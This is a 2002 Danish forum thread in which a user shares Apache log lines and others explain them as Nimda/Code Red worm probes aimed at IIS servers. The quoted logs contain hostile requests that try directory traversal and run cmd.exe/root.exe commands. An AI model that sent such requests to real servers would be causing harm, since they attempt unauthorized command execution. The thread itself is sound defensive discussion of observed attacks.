/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Underlige ting i Apache-log
Fra : Xylofonius


Dato : 02-02-02 14:58

Hej,

Jeg er ikke så erfaren i Apache endnu til, at kunne gennemskue dens
logfiler,
så jeg håber, at I kan hjælpe mig.
Jeg har kun én php-fil (icq.php), som kører på min computer. Der er linket
til
den fra min hjemmeside. Alligevel er der nogle (for mig) mystiske ting i
loggen.
Det kan også være, at det er helt almindeligt. De kommer her i forkortet
form:

212.110.138.242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
212.110.138.242 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
212.110.138.242 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.110.138.242 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.110.138.242 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 298
212.110.138.242 "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315

212.88.158.217 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
212.88.158.217 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
212.88.158.217 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.88.158.217 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
212.88.158.217 "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 298
212.88.158.217 "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315
[SNIP mange flere]

For mig ser det ud til, at det drejer sig om to forskellige prosoner, der
forsøger at få adgang til administratorstatus og
en kommandoprompt.

212.110.138.242 kommer fra en internet café i Tyskland
212.88.158.217 er fra Crimean Research Education Centre i Ukraine

Det er jo nok svært at gøre noget ved. Skal jeg bare glemme det?

--
Best regards / Mes meilleures amitiés / Med venlig hilsen
Andreas Kryger Jensen
http://www.compose.subnet.dk
OUT &h64, &hfe



 
 
Per H. Nielsen (02-02-2002)
Kommentar
Fra : Per H. Nielsen


Dato : 02-02-02 15:38

"Xylofonius" <xylofonius@hotpop.com> writes:

>Hej,

>Jeg er ikke så erfaren i Apache endnu til, at kunne gennemskue dens
>logfiler,
>så jeg håber, at I kan hjælpe mig.

Det stammer fra folk, der er inficeret med Nimda eller Code Red virus.
Disse forsøger at angribe IIS-baserede Web-servere.
Glæd dig over, at du kører Apache, som er ganske immun overfor
disse angreb.

Jeg fik selv læssevis af disse i min Apache-log, så jeg har sat
den op til at smide det i en separat logfil.

Hilsen
Per

--
Per H. Nielsen <phn@dkscan.dkx>
My Danish Scanner Pages: http://www.dkscan.dk
To reply to this change .dkx to .dk in my address.

Xylofonius (02-02-2002)
Kommentar
Fra : Xylofonius


Dato : 02-02-02 16:02

> Det stammer fra folk, der er inficeret med Nimda eller Code Red virus.
> Disse forsøger at angribe IIS-baserede Web-servere.
> Glæd dig over, at du kører Apache, som er ganske immun overfor
> disse angreb.
Ok tak. Så er jeg mere rolig.

--
Best regards / Mes meilleures amitiés / Med venlig hilsen
Andreas Kryger Jensen
http://www.compose.subnet.dk
OUT &h64, &hfe



Kim S. Poulsen (02-02-2002)
Kommentar
Fra : Kim S. Poulsen


Dato : 02-02-02 16:35

On Sat, 2 Feb 2002 14:58:21 +0100, "Xylofonius"
<xylofonius@hotpop.com> wrote:
klip
>
>212.110.138.242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
klip

Det er NIMDA virusen, den er kun en trussel for 'unpatched' IIS
(Windows) servere.
Venlig Hilsen
Kim S. Poulsen

Søg
Reklame
Statistik
Spørgsmål : 177550
Tips : 31968
Nyheder : 719565
Indlæg : 6408823
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste